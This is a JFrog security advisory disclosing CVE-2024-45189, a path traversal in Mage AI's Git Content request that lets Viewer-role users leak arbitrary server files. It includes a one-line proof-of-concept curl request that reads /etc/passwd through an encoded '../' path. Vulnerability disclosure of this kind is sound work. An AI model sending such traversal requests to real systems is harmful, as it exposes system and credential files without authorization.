JFrog Security Research
< Back

JFSA-2024-001039604 - Mage AI git content request remote arbitrary file leak

CVE-2024-45189 | CVSS 6.5

JFrog Severity:medium

Discovered ByOri Hollanderof the JFrog Security Research Team

Published 23 Aug, 2024 | Last updated 23 Aug, 2024

Mage AI git content request remote arbitrary file leak

mage-ai

(,)

Mage AI allows remote users with the "Viewer" role to leak arbitrary files from the Mage server due to a path traversal in the "Git Content" request

curl -X GET
'http://localhost:6789/api/git_file/..%2F..%2Fetc%2Fpasswd?api_key=<USER API KEY>' -H 'Authorization: Bearer
<USER TOKEN>'

No mitigations are supplied for this issue

No references are supplied for this issue

< Back